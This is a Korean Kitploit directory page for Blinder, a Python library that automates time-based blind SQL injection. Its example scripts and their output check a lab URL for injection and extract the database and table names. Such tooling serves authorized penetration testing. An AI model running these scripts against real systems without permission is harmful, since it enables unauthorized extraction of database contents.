Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
Blinder — 시간 기반 블라인드 SQL 인젝션을 자동화하는 파이썬 라이브러리 | Kitploit
도구/GitHubGitHub/mhaskar/blinder
Vulnerability AnalysisWeb SecurityPenetration TestingDatabase Security
GitHubmhaskar/blinder

Blinder

시간 기반 블라인드 SQL 인젝션을 자동화하는 파이썬 라이브러리

저장소 보기
50156년 전Kitploit 검토 완료

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

Blinder

Blinder는 사전 정의된 쿼리를 함수로 사용하여 시간 기반 블라인드 SQL 인젝션을 자동화하고 신속한 PoC 개발을 지원하는 소형 Python 라이브러리입니다.

설치

Blinder는 다음 명령어로 설치할 수 있습니다:

pip install blinder

또는 소스 코드를 다운로드하여 프로젝트에 수동으로 임포트할 수도 있습니다.

사용법

Blinder를 사용하려면 Blinder 모듈을 임포트한 후 Blinder의 주요 함수들을 사용하기 시작하면 됩니다.

현재 버전의 Blinder로 다음 작업을 수행할 수 있습니다:

  • 시간 기반 인젝션 확인
  • 데이터베이스 이름 가져오기
  • 테이블 이름 가져오기

다음 코드로 URL에서 인젝션을 확인할 수 있습니다:

root@kitploit:~
#!/usr/bin/python

import Blinder

blind = Blinder.blinder(
    "http://sqli-lab/sql_injection/index.php?search=3",
    sleep=1
 )

print blind.check_injection()

실행 결과는 다음과 같습니다:

root@kitploit:~
root@kali:~/Desktop# python check.py
True
root@kali:~/Desktop#

다음 코드로 데이터베이스 이름을 가져올 수 있습니다:

root@kitploit:~
#!/usr/bin/python

import Blinder

blind = Blinder.blinder(
    "http://sqli-lab/sql_injection/index.php?search=3",
    sleep=1
 )

print "Database name is : %s " % blind.get_database()

결과는 다음과 같습니다:

root@kitploit:~
root@kali:~/Desktop# python get-database.py
Database name is : db1
root@kali:~/Desktop#

테이블 이름을 가져오려면 다음 코드를 사용하세요:

root@kitploit:~
#!/usr/bin/python

import Blinder

blind = Blinder.blinder(
    "http://sqli-lab/sql_injection/index.php?search=3",
    sleep=1
 )

tables = blind.get_tables()

for table in tables:
    print table

결과는 다음과 같습니다:

root@kitploit:~
root@kali:~/Desktop# python get-tables.py
blogs
notes
root@kali:~/Desktop#

TODO

곧 많은 기능이 추가될 예정입니다:

  • 사용자 정의 쿼리 추가 기능
  • Burp 요청 기반 인젝션 포인트 테스트
  • 테이블/컬럼 데이터 추출
도구 다운로드